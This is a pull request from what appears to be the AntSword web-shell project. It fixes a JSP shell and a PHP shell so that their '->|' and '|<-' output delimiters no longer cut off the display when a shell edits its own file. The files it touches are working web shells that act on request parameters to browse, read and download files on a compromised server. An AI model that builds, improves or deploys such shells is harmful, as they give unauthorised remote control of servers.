### PR TITLE
fix(custom):custom shell edit self bug

### DIFF
--- a/shells/jsp_custom_spy_for_mysql.jsp
+++ b/shells/jsp_custom_spy_for_mysql.jsp
@@ -20,7 +20,8 @@
  4. 本脚本中 encoder 与 AntSword 添加 Shell 时选择的 encoder 要一致，如果选择 default 则需要将 encoder 值设置为空
 
 ChangeLog:
-
+  Data: 2016/04/29 v1.2
+   1. 修正修改包含结束tag的文件会出错的 bug
   Date: 2016/04/06 v1.1
    1. 修正下载文件参数设置错误
    2. 修正一些注释的细节
@@ -169,11 +170,11 @@ ChangeLog:
         r.reset();
         ServletOutputStream os = r.getOutputStream();
         BufferedInputStream is = new BufferedInputStream(new FileInputStream(filePath));
-        os.write(("->|").getBytes(), 0, 3);
+        os.write(("->"+"|").getBytes(), 0, 3);
         while ((n = is.read(b, 0, 512)) != -1) {
             os.write(b, 0, n);
         }
-        os.write(("|<-").getBytes(), 0, 3);
+        os.write(("|"+"<-").getBytes(), 0, 3);
         os.close();
         is.close();
     }

--- a/shells/jsp_custom_spy_for_mysql.jsp
+++ b/shells/jsp_custom_spy_for_mysql.jsp
@@ -336,7 +336,7 @@ ChangeLog:
         String z2 = decode(EC(request.getParameter("z2") + ""), encoder);
         String z3 = decode(EC(request.getParameter("z3") + ""), encoder);
         String[] pars = { z0, z1, z2, z3};
-        sb.append("->|");
+        sb.append("->" + "|");
 
         if (funccode.equals("B")) {
             sb.append(FileTreeCode(pars[1]));
@@ -376,6 +376,6 @@ ChangeLog:
     } catch (Exception e) {
         sb.append("ERROR" + "://" + e.toString());
     }
-    sb.append("|<-");
+    sb.append("|" + "<-");
     out.print(sb.toString());
 %>

--- a/shells/php_custom_spy_for_mysql.php
+++ b/shells/php_custom_spy_for_mysql.php
@@ -339,7 +339,7 @@ $z2 = decode(EC($_REQUEST['z2']));
 $z3 = decode(EC($_REQUEST['z3']));
 
 // echo "<meta HTTP-EQUIV=\"csontent-type\" content=\"text/html; charset={$cs}\">";
-echo "->|";
+echo "->"."|";
 $ret = "";
 try {
     switch ($funccode) {
@@ -402,5 +402,5 @@ try {
     $ret = "ERROR://".$e;
 }
 echo $ret;
-echo "|<-";
+echo "|"."<-";
 ?>


### PR DESCRIPTION
修复 custom shell 在编辑自身时因为包函结束符号而截断显示的 bug
close #45 